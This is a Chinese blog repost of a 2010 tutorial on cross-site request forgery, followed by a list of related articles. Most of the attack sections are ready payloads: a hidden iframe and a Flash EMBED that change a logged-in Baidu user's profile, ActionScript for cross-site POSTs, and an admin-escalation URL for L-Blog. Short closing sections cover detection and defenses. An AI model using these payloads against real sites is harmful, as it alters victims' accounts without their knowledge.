如何防止CSRF注入式攻击

最新推荐文章于 2022-07-01 21:45:34 发布
最新推荐文章于 2022-07-01 21:45:34 发布
阅读量113 收藏
点赞数
文章标签: javascript ViewUI
原文链接:http://www.cnblogs.com/justwannaloveyou/archive/2010/11/20/1882684.html
版权

0x01 什么是CSRF攻击

    CSRF是Cross Site Request Forgery的缩写(也缩写为XSRF),直译过来就是跨站请
求伪造的意思,也就是在用户会话下对某个CGI做一些GET/POST的事情——这些事情用
户未必知道和愿意做,你可以把它想做HTTP会话劫持。
    网站是通过cookie来识别用户的,当用户成功进行身份验证之后浏览器就会得到一个标
识其身份的cookie,只要不关闭浏览器或者退出登录,以后访问这个网站会带上这个
cookie。如果这期间浏览器被人控制着请求了这个网站的url,可能就会执行一些用户不想
做的功能(比如修改个人资料)。因为这个不是用户真正想发出的请求,这就是所谓的请
求伪造;呵呵,因为这些请求也是可以从第三方网站提交的,所以前缀跨站二字。
    举个简单的例子,某个bbs可以贴图,在贴图的URL中写入退出登陆的链接,当用户阅读
这个帖子之后就会logout了,因为用户以自己的身份访问了退出登陆链接,在用户看来是帖
子里面有一张有问题的“图片”,而不是想要退出,但程序就会认为是用户要求退出登陆
而销毁其会话。这就是传说中的CSRF攻击了。
    不要小看CSRF哦,记得以前L-Blog就存在一个CSRF漏洞(当时还不知道这个概
念:p),它添加管理员是这样的一个链接:http://localhost/L-Blog/admincp.asp?
action=member&type=editmem&memID=2&memType=SupAdmin,我们只要构造好ID想
办法让管理员访问到这个URL就可以了;还有Google那个CSRF漏洞[1],将导致邮件泄
漏;另外,不要以为只有XSS才能爆发蠕虫,只要条件合适,CSRF同样是有可能的。


0x02 威胁来自哪里

    贴图只是GET的方式,很多时候我们需要伪造POST的请求。一个办法是利用跨站,
当然目标站点可能不存在跨站,这个时候我们可以从第三方网站发动攻击。
    比如我要攻击一个存在问题的blog,那就先去目标blog留言,留下一个网址,诱其主
人点击过来(这个就要看你的忽悠本事咯:p),然后构造个HTML表单提交些数据过去。
    多窗口浏览器就帮了一点忙。
    多窗口浏览器(firefox、遨游、MyIE……)便捷的同时也带来了一些问题,因为多窗
口浏览器新开的窗口是具有当前所有会话的。即我用IE登陆了我的Blog,然后我想看新闻
了,又运行一个IE进程,这个时候两个IE窗口的会话是彼此独立的,从看新闻的IE发送请
求到Blog不会有我登录的cookie;但是多窗口浏览器永远都只有一个进程,各窗口的会话
是通用的,即看新闻的窗口发请求到Blog是会带上我在blog登录的cookie。
    想一想,当我们用鼠标在Blog/BBS/WebMail点击别人留下的链接的时候,说不定一场
精心准备的CSRF攻击正等着我们。


0x03 发起CSRF攻击

    从第三方站点利用POST发动CSRF攻击就是利用Javascript自动提交表单到目标CGI。
每次都去写表单不是很方便,辅助进行的工具有XSS POST Forwarder[2]和CSRF Redirector[3],这里我也写了相应的ASP版本[4]。使用的时候只要把提交的url和参数传
给它,它就会自动POST到目标。
    比如我要提交一些数据到
www.0x54.org/a.asphttp://www.0x54.org/lake2/xss_post_forwarder.asp?
lake2=http://www.0x54.org/a.asp&a=123&b=321&c=%26%23%25
(这里要自己考虑URL编码哦)
    不过实际攻击的时候你得动动脑子:如何才能把用户诱骗到我们的网页来。


0x04 一个实例

    因为CSRF不如XSS那么引人注目,所以现在找一个存在CSRF的Web应用程序还是很
容易的。这次我们的目标是百度,just for test。
    随便你用什么办法,让一个已登陆百度的用户访问一下这个URL:
    http://www.0x54.org/lake2/xss_post_forwarder.asp?
lake2=http://passport.baidu.com/ucommitbas&u_jump_url=&sex=1
&email=CSRF@baidu.com&sdv=&zodiac=0&birth_year=0&birth_month=0&birth_day=0
&blood=0&bs0=%C7%EB%D1%A1%D4%F1
&bs1=%C7%EB%D1%A1%D4%F1&bs2=%CE%DE&txt_bs=&birth_site=%3B%3B
&b%3Drs0=%C7%EB%D1%A1%D4%F1
&rs1=%C7%EB%D1%A1%D4%F1&rs2=%CE%DE&txt_rs=&reside_site=%3B%3B
    呵呵,然后看看那人个人资料是不是被修改了。这里有点郁闷,当那人访问URL后浏览
器会返回到资料修改成功的页面,我们就被发现了。那么,有没有办法不让浏览器刷新
呢?
    有。
    一个办法是用iframe,构造这样的HTML代码:
    <iframe width=0 height=0 src="http://www.0x54.org/lake2/xss_post_forwarder.asp?
lake2=http://passport.baidu.com/ucommitbas&u_jump_url=&sex=1
&email=CSRF@baidu.com&sdv=&zodiac=0&birth_year=0&birth_month=0
&birth_day=0&blood=0&bs0=%C7%EB%D1%A1%D4%F1
&bs1=%C7%EB%D1%A1%D4%F1&bs2=%CE%DE&txt_bs=
&birth_site=%3B%3B&b%3Drs0=%C7%EB%D1%A1%D4%F1
&rs1=%C7%EB%D1%A1%D4%F1&rs2=%CE%DE&txt_rs=&reside_site=%3B%3B"></iframe>
    还有一个办法就是用flash了。


0x05 CSRF With Flash

    flash是可以提交数据到任意URL的,打开盗版的 Adobe flash CS 3 Professional,新
建一个 flash文件(ActionScript 3.0) ,在默认的图层上点右键选动作,然后把以下代码
添加进去:

       import flash.net.URLRequest;
       import flash.system.Security;
       var url = new URLRequest("http://www.0x54.org/lake2");
       var lake = new URLVariables();
       lake = "a=lake2";
       url.method = "POST";
       url.data = lake;
       sendToURL(url);
       stop();

    导出为swf文件,访问之,抓包看看效果咯:
http://www.0x54.org/lake2/flash/test1.html
    每次都去写as和编译swf很麻烦的,根据CSRF Redirector的思路我写了一个类似的
flash程序[5],再拿百度来试试效果,访问带如下HTML的网页:
    <EMBED src="http://www.0x54.org/lake2/flash/flash_hacking.swf?
f=1&t=http://passport.baidu.com/ucommitbas
&d=u_jump_url%3D%26sex%3D1%26email%3DCSRF@
baidu.com%26sdv%3D%26zodiac%3D0%26birth_year%3D0%26birth_month
%3D0%26birth_day%3D0%26blood%3D0%26bs0%3D%25C7%25EB%25D1
%25A1%25D4%25F1%26bs1%3D%25C7%25EB%25D1%25A1%25D4%25F1
%26bs2%3D%25CE%25DE%26txt_bs%3D%26birth_site%3D%253B%253B
%26b%253Drs0%3D%25C7%25EB%25D1%25A1%25D4%25F1%26rs1%3D
%25C7%25EB%25D1%25A1%25D4%25F1%26rs2%3D%25CE%25DE
%26txt_rs%3D%26reside_site%3D%253B%253B"></EMBED>
(还是要注意URL二次编码)
    这里不要只局限于发请求,其实flash是可以得到返回内容的,要是返回内容有敏感信
息的话,就可以读出来发送到我们控制的Web去。当然,这个得看目标站点是否让flash
跨域取内容了。


0x06 检测CSRF

    检测CSRF漏洞都是体力活了,先抓取一个正常请求的数据包,然后去掉referer字段
再重新提交,如果还是有效那基本上就存在问题了。当然参数可能含有不能预测的参数(比如userid什么的),这个时候就看这个不可预测的参数能不能通过其他手段比如flash
拿到,如果能,呵呵,则还是存在问题。还有就是试着改post为get,因为有些程序是不
区分get/post的。
    应用程序的功能和返回形式都各不相同,所以想自动化测试CSRF漏洞还是有点困难
的,OWASP上面有一个叫做CSRFTester的工具不妨拿来一试[6]


0x07 防御CSRF

    在Web应用程序侧防御CSRF漏洞,一般都是利用referer、token或者验证码,Nexus
的文章[7]已经写的很全面了;superhei也有提出bypass的思路[8],请参考他们的文章。

    还有一个思路是在客户端防御,貌似可以做成一个类似HTTP Watch的软件,挂在浏览
器上拦截或者过滤跨域的cookie

转载于:https://www.cnblogs.com/justwannaloveyou/archive/2010/11/20/1882684.html

djbjh55539
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
前端安全:如何防止CSRF攻击
02-24
在移动互联网时代,前端人员除了传统的XSS、CSRF等安全问题之外,又时常遭遇网络劫持、非法调用HybridAPI等新型安全问题。当然,浏览器自身也在不断在进化和发展,不断引入CSP、Same-SiteCookies等新技术来增强安全...
XSS 与 CSRF 与 SQL注入
qq_40821997的博客
06-05 333
跨站请求伪造(Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF,是一种挟制用户在当前已登录的 Web 应用程序上执行非本意的操作的攻击方法。flask 模仿csrf攻击 与 保护:https://www.cnblogs.com/love2000/p/13678360.html(1)场景一(2)场景二跨站请求可以用什么方式:CSRF常见的攻击类型: (1)GET类型的CSRF(2)
Web攻防之XSS,CSRF,SQL注入的简单介绍
01-10 396
摘要:对Web服务器的攻击也可以说是形形色色、种类繁多,常见的有挂马、SQL注入、缓冲区溢出、嗅探、利用IIS等针对Webserver漏洞进行攻击。本文结合WEB TOP10漏洞中常见的SQL注入,跨站脚本攻击(XSS),跨站请求伪造(CSRF攻击的产生原理,介绍相应的防范方法。 关键字:SQL注入,XSS,CSRF 1.SQL注入 所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的...
pikachu靶场&CSRF&SQL注入(三)
weixin_41665162的博客
08-04 438
文章目录CSRF概述CSRF-GETCSRF-POSTCSRF-TOKENSQL注入概述数字型注入字符型注入搜索型注入XX型注入insert/update/delete注入函数介绍注入原理 CSRF 概述 举个栗子: 用户想要修改自己的账户信息,那么他的修改流程是这样的 登陆账户—>修改信息&点击提交—>修改成功 这其中有两个要求,第一账有户密码(登陆权限)、第二有修改信息的链接格式;现在如果有个攻击者想要修改用户的信息,就要先获得一个修改链接,修改其中信息(链接可以自己注册账户,抓
前段缓存以及xss csrf sql注入
weixin_45346239的博客
07-01 182
前段缓存以及xss csrf sql注入
CSRF——攻击与防御
热门推荐
lake2的专栏
04-02 4万+
CSRF——攻击与防御author: lake20x01 什么是CSRF攻击    CSRF是Cross Site Request Forgery的缩写(也缩写为XSRF),直译过来就是跨站请求伪造的意思,也就是在用户会话下对某个CGI做一些GET/POST的事情——这些事情用户未必知道和愿意做,你可以把它想做HTTP会话劫持。    网站是通过cookie来识别用户的,当用户成功进行
Yii框架防止sql注入,xss攻击csrf攻击的方法
10-21
主要介绍了Yii框架防止sql注入,xss攻击csrf攻击的方法,结合实例形式分析了Yii框架针对sql注入,xss攻击csrf攻击的防范方法与相关函数调用注意事项,需要的朋友可以参考下
CSRF攻击与防御
02-26
这时,该转帐请求的Referer值就会是转账按钮所在的页面的URL,通常是以bank.example域名开头的地址。而如果黑客要对银行网站实施CSRF攻击,他只能在他自己的网站构造请求,当用户通过黑客的网站发送请求到银行
详解利用django中间件django.middleware.csrf.CsrfViewMiddleware防止csrf攻击
09-20
主要介绍了详解利用django中间件django.middleware.csrf.CsrfViewMiddleware防止csrf攻击,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
web安全--CSRF攻击原理及防御方法
fabao007的专栏
05-02 265
CSRF概念:CSRF跨站点请求伪造(Cross—Site Request Forgery),跟XSS攻击一样,存在巨大的危害性,你可以这样来理解: 攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,盗取你的账号,添加系统管理员,甚至于购买商品、虚拟货币转账等。如下:其中Web A为存...
CSRF攻击与防御
weixin_33985679的博客
05-15 81
0x01 什么是CSRF攻击     CSRF是Cross Site Request Forgery的缩写(也缩写为XSRF),直译过来就是跨站请求伪造的意思,也就是在用户会话下对某个CGI做一些GET/POST的事情——这些事情用户未必知道和愿意做,你可以把它想做HTTP会话劫持。    网站是通过cookie来识别用户的,当用户成功进行身份验证之后浏览器就会得到一个标识其身份的coo...
常见网络攻击及防御方法总结(XSS、SQL注入、CSRF攻击
xiaohui的博客
04-05 3663
  从互联网诞生之初起,无时无刻不存在网络攻击,其中XSS攻击和SQL注入攻击是网站应用攻击的最主要的两种手段,全球大约70%的网站应用攻击都来自XSS攻击和SQL注入攻击。此外,常用的网站应用攻击还包括CSRF、Session劫持等。 1、 XSS攻击   XSS攻击即跨站点脚本攻击(Cross Site Script),指的是攻击者通过篡改网页,注入恶意的HTML脚本,在用户浏览网页时,控制用户浏览器进行恶意操作的一种攻击方式。   常见的XSS攻击类型有两种,一种是反射型,攻击者诱使用户点击一个嵌入恶
PHP 预防CSRF、XSS、SQL注入攻击
云博客_资源宝分享
10-10 1443
1.服务端进行CSRF防御 服务端的CSRF方式方法很多样,但总的思想都是一致的,就是在客户端页面增加伪随机数。 (1).Cookie Hashing(所有表单都包含同一个伪随机值): 这可能是最简单的解决方案了,因为攻击者不能获得第三方的Cookie(理论上),所以表单中的数据也就构造失败了 (2).验证码   这个方案的思路是:每次的用户提交都需要用户在表单中填写一个图片上的随机字符串,厄…这个方案可以完全解决CSRF,但个人觉得在易用性方面似乎不是太好,还有听闻是验证码图片的使用涉及了一个被称为MHT
SQL 注入、XSS 攻击CSRF 攻击
weixin_33910434的博客
09-22 1172
SQL 注入、XSS 攻击CSRF 攻击 SQL 注入 什么是 SQL 注入 SQL 注入,顾名思义就是通过注入 SQL 命令来进行攻击,更确切地说攻击者把 SQL 命令插入到 web 表单或请求参数的查询字符串里面提交给服务器,从而让服务器执行编写的恶意的 SQL 命令。 对于 web 开发者来说,SQL 注入已然是非常熟悉的,而且 SQL 注入已经生存了 10 多...
Csrf攻击防止
八点半技术站
11-05 9990
CSRF 的全称是“跨站请求伪造”,而 XSS 的全称是“跨站脚本”。看起来有点相似,它们都是属于跨站攻击——不攻击服务器端而攻击正常访问网站的用户,但前面说了,它们的攻击类型是不同维度上的分 类。CSRF 顾名思义,是伪造请求,冒充用户在站内的正常操作。 我们知道,绝大多数网站是通过 cookie 等方式辨识用户身份(包括使用服务器端 Session 的网站,因为 Session ...
详解Web安全攻防战(DoS攻击CSRF、XSS、SQL注入)
五撸超人的博客
03-31 3152
       之前学校做的项目都没有像样地考虑过安全方面的问题。今天复习面试的时候看到Web安全部分,学习并总结一下。(PS: Web安全几乎是大厂面试必问的问题,想进大厂的同学注意啦。) 前言        用户信息泄露、网站被黑甚至网银被盗用的事件屡见不...
如何防止SQL注入,XSS攻击CSRF攻击
weixin_37657720的博客
02-23 2145
        SQL注入:mysqli_real_escape_string()转义关键字符;         XSS攻击:alert把一些cookie信息打印出来;过滤掉&lt;&gt;等关键字符串         CSRF攻击:跨站攻击防止:token,验证码...
暴力破解&命令注入&CSRF&代码注入
Pvr1sC的博客
02-02 700
命令注入漏洞 漏洞产生原因: 在Web程序中,因为业务功能需求要通过web前端传递参数到后台服务器上执行(特别是一些网络设备的Web管理界面),但由于开发人员没科对输入进行产格的过滤,导致攻击者可以构造一些额外的“带有非法目的”命令,欺骗后台服务器执行。 漏洞危害: 如果web应用使用的是root权限,则该漏洞可以导致攻击者在服务器上执行任意命令。 跨站请求伪造 CSRF攻击的实施前提 目标网站存在CSRF漏洞。 受害者需要保持目标站点的登录活动状态。 受害者需要点击钓鱼链接。 钓鱼 生成短链接 CSRF
常见的 CSRF、XSS、sql注入、DDOS流量攻击
echo_laodong的博客
02-05 6845
CSRF攻击 :跨站请求伪造攻击CSRF全名是Cross-site request forgery,是一种对网站的恶意利用,CSRF比XSS更具危险性        攻击者一般会使用吸引人的图片去引导用户点击进去他设定好的全套,然后你刚登录的A网站没有关闭,这时候攻击者会利用JS事件去模拟用户请求A网站信息,从而就得到了目的。预防措施:为表单提交都加上自己定义好的token然后加密好,后台也
URL攻击与XSS攻击的本质不同之处是什么?
最新发布
06-13
URL攻击是指攻击者通过构造恶意URL来欺骗用户或攻击Web应用程序,常见的包括CSRF(跨站请求伪造)和Open Redirect(开放式重定向)等。攻击者主要利用Web应用程序对URL参数的信任,来伪造用户的请求或者进行一些恶意...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值